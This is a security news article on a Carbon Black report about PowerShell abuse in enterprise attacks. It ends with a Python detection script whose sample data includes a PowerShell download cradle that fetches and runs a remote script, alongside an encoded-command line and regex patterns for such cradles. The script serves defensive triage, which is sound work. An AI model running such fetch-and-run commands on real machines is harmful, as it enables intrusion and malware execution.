PowerShell Exploits Spotted in Over a Third of Attacks


Security experts are warning that Microsoft PowerShell attacks now represent a major enterprise security risk, accounting for 38% of incidents seen by endpoint security vendor Carbon Black and its partners.

PowerShell is the task automation framework built into Windows, and it can load and execute code in memory without ever writing a file to disk. That makes it an attractive way for malware authors to hide their presence while extending their access to endpoints, typically in a post-exploitation scenario, Carbon Black claimed.

The firm interviewed over 20 security partners including Rapid7 and Ernst & Young, analyzing the results of over 1,000 investigations last year to gain a comprehensive picture of PowerShell activity in its Unified Threat Research report.

While 38% had seen PowerShell used in attacks, a worrying 31% claimed their clients had received no security alerts before they looked into whether the Microsoft tool had been exploited.

It’s used in a variety of attacks, whether designed to steal sensitive IP (17%), customer PII (15%), financial data (18%) or to disrupt services (15%).

And while 13% of the time PowerShell was used in targeted attacks, the vast majority of the time (87%) it’s being abused in commodity attacks such as click-fraud, fake AV, ransomware and other opportunistic malware, the study found.

The report explained the following:

“One thing is clear: PowerShell is not used in any one specific type of attack. While techniques varied (from passing binaries encoded on command lines, to downloading scripts from compromised websites, to interactive sessions where an attacker used reverse command shells to execute individual commands) the types of attacks were even more varied. We saw PowerShell used for click fraud, banking Trojans, password sniffing, and more targeted credential and IP theft.”

Actual malicious behavior associated with PowerShell attacks can range from lateral movement inside an organization (47%) to credential theft (47%), privilege escalation (37%), data exfiltration (26%), establishing persistence (47%), system disruption (26%) and command and control activity (61%).

Just last month, Carbon Black alerted customers about a new form of ransomware written in PowerShell. The so-called 'PowerWare' targeted users via a malicious Microsoft Word document.

Carbon Black chief security strategist, Ben Johnson, claimed that mitigating the risk of PowerShell attacks can be difficult as blocking them outright is often not an option.

“Setting standards around how PowerShell can be used – for example, by establishing policies that ensure only signed scripts are allowed to run – puts security teams in a much stronger position to identify an intrusion when it happens, while still enabling functionality,” he told Infosecurity.

“For example, by looking at the command line, they should be able to spot any tell-tale signs that a script has been run out of turn. Or by checking Windows Registry they can identify unauthorised changes to policies that indicate an attack has been launched.”

Checking whether an upgrade to version 3.0, which offers improved logging and security features, is possible is also an option, Johnson added.
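As an added illustration of the command-line inspection Johnson describes (example code written for this article, not Carbon Black's or Infosecurity's tooling), the script below scans constructed PowerShell process command lines for the signs the report mentions: encoded commands passed on the command line, script download cradles, and execution-policy bypasses. The sample lines, the indicator names and the thresholds are assumptions chosen for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation command lines (not real captures).
SAMPLE_COMMAND_LINES = [
    # Hidden window plus a base64 blob on the command line; the blob is made up.
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMA",
    # Policy bypass and an in-memory download of a script from the web.
    'powershell.exe -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/a.ps1')\"",
    # Benign scheduled job: script on disk, default policy.
    r"powershell.exe -File C:\Scripts\nightly-backup.ps1",
    # Benign: explicitly requires signed scripts, as the article recommends.
    r"powershell.exe -ExecutionPolicy AllSigned -File C:\Scripts\inventory.ps1",
]

# Each indicator is a regex over the command line. powershell.exe accepts
# unambiguous parameter prefixes (-e, -enc, -w, -ep, -ex ...), so the patterns
# allow the short forms as well as the full parameter names.
INDICATORS: Dict[str, re.Pattern] = {
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass": re.compile(
        r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}


def scan_command_line(cmd: str) -> List[str]:
    """Return the sorted names of every indicator present in one command line."""
    return sorted(name for name, pattern in INDICATORS.items() if pattern.search(cmd))


def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Map each command line that trips at least one indicator to its indicators.

    Lines with no indicators are omitted, so the result is the alert list an
    analyst would review; an empty dict means nothing stood out."""
    return {cmd: hits for cmd in lines if (hits := scan_command_line(cmd))}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMAND_LINES).items():
        print(f"ALERT {hits}: {cmd[:70]}...")
```

The indicators are a starting point rather than a verdict: a hidden window or an encoded command also appears in legitimate automation, so the output is meant to feed an analyst's review alongside the registry and policy checks mentioned above.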
